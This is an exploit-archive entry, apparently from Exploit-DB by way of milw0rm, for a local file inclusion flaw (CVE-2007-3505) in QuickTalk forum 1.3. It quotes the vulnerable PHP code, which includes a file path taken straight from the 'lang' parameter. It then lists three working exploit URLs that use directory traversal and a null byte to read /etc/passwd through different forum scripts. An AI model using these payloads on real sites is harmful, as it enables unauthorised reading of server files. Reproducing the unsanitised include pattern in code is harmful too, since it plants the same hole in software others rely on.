QuickTalk forum 1.3 - 'lang' Local File Inclusion

Author: Katatafish
type: webapps
platform: php
port: 
date_added: 2007-06-26  
date_updated: 2016-11-15  
verified: 1  
codes: OSVDB-36487;CVE-2007-3505;OSVDB-36486;OSVDB-36485  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4115.txt  
###QuickTalk forum v1.3 Local File Inclusion###

#download: http://www.qt-cute.org/download/qtf13.zip

#found by: katatafish (karatatata@hush.com)

#vulncode:
 $strLang = $_GET["lang"];
 include("language/$strLang/qtf_lang_reg.inc");

#exploits:

 http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00

#thanks:str0ke

# milw0rm.com [2007-06-27]